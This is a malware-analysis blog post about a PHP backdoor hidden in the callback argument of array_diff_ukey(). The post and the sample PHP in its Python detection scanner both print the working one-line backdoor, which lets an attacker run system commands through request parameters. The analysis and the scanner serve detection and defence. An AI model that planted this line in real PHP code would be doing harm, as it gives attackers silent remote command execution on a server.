PHP Callback Functions: Another Way to Hide Backdoors

We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter.

Everyone who writes code in PHP knows what the eval() function is for. It evaluates a string as PHP code. In other words, it executes the code. But there are many other ways to run code, and they are not always so obvious. The most popular and commonly used one is the preg_replace() function.

According to its description, the preg_replace function “performs a regular expression search and replace.” Unfortunately, when the “\e” modifier is used, this function will also execute code. Yes, there are still more ways to run code without using eval(): create_function() and assert() are two examples. All of these options for running code make malware analysis that much more complex a process.

That being said, even with our insights we continue to find ingenious ways that malware authors are employing for their backdoors.

The Backdoor

It started with the following line of code injected at the top of a legitimate PHP file:

@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);

It took me a little while to understand how this could work (and thanks to Ante Kresic for helping me here), but in the end, I realized that the problem is in the callback functions. Can you see why?

The malware author set the callback function to the request variable “login”, which is controlled by the attacker. So he can set login to the system or exec function, allowing him to execute commands on the server.

Take a look at this example:

[Screenshot: array_diff_ukey]

Yes, he just ran the “system” command using this technique, and he can execute any other command he wants on the server with that one line of code. To make matters worse, that little payload was not detected by any anti-virus or security software that we tested.

What’s the Big Deal?

Most security tools and articles online recommend that webmasters look for a certain subset of functions that are often used for malicious purposes: eval, preg_replace, base64_decode and a few other combinations. Well, guess what: attackers know that too, and look at what they are starting to employ, good functions for bad purposes.

Also, note that they are not restricted to the array_diff_ukey() function; any other function that accepts a callback will do.
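One way to look for this class of backdoor, added here as an example and not code from the original post: it finds calls to a short list of callback-accepting PHP functions, isolates the argument in the callback position, and flags anything that is not a closure or a quoted function name, rating it high when the expression reads from a request superglobal. The function list, the severity labels and the sample PHP (which includes the line from this post) are assumptions of the example.

```python
import re

# PHP functions that take a user callback -> 0-based index of the callback argument (negative = from end).
CALLBACK_FUNCS = {"array_diff_ukey": -1, "array_udiff": -1, "array_map": 0, "array_filter": 1,
                  "array_walk": 1, "usort": 1, "uasort": 1, "uksort": 1, "call_user_func": 0,
                  "call_user_func_array": 0, "preg_replace_callback": 1, "ob_start": 0}
USER_INPUT = ("$_REQUEST", "$_GET", "$_POST", "$_COOKIE", "$GLOBALS")
CALL_RE = re.compile(r"(?<![\w$>:])@?(" + "|".join(CALLBACK_FUNCS) + r")\s*\(")

def split_args(src, i):  # top-level arguments of the call whose '(' is at src[i], or None if unbalanced
    depth, quote, esc, args = 1, None, False, [""]
    for ch in src[i + 1:]:
        if esc:                       # character after a backslash inside a string literal
            esc = False
        elif quote:                   # inside a string literal: commas and parens don't count
            if ch == "\\": esc = True
            elif ch == quote: quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "([":
            depth += 1
        elif ch in ")]" and (depth := depth - 1) == 0:
            return [a.strip() for a in args]
        elif ch == "," and depth == 1:
            args.append(""); continue
        args[-1] += ch
    return None

def classify(cb):  # severity of a callback expression; None for closures and quoted function names
    cb = cb.lstrip("@").strip()
    if re.match(r"(static\s+)?(function|fn)\b", cb) or re.fullmatch(r"['\"][\w\\:]+['\"]", cb):
        return None
    return "high" if any(g in cb for g in USER_INPUT) else "medium"

def scan(src):  # (line, function, callback_expr, severity) for each risky callback in PHP source
    findings = []
    for m in CALL_RE.finditer(src):
        args, idx = split_args(src, m.end() - 1), CALLBACK_FUNCS[m.group(1)]
        if args and -len(args) <= idx < len(args) and (sev := classify(args[idx])):
            findings.append((src.count("\n", 0, m.start()) + 1, m.group(1), args[idx], sev))
    return findings

# Constructed sample: two benign calls, the line from this post, and a callback read from $_POST.
SAMPLE_PHP = r"""<?php
$names = array_map('strtoupper', $names);
usort($rows, function ($a, $b) { return $a <=> $b; });
@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);
$cb = $_POST['x']; $items = array_filter($items, $cb);
"""
```

This is a heuristic pass, not a PHP parser: a "medium" hit such as a callback passed through a plain variable still needs a manual look at where that variable came from.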

There goes the neighborhood…

About Peter Gramantik

Peter has been working in Information Security for over 10 years. He previously worked as a Virus Analysis Specialist for AVG and now holds the Sucuri flag as a Senior Malware Researcher on the SucuriLabs team. When he’s not on the clock, you can find him singing and playing guitar or ukulele in one of his bands, fishing, riding his Harley Davidson Sportster, or researching malware on his own. Follow him on Twitter at @petergramantik.

  • http://watwebdev.com/ David Watkinson

    Shouldn’t it be “all your data ARE belong to me”? lol
    On a more serious note, I would doubt that anti-virus would detect that, but security systems should have detected it or at worst flagged it. Maybe security systems should be looking for access methods within code also.

  • Chilion Snoek

    Sir! How can we check for those damn functions? :(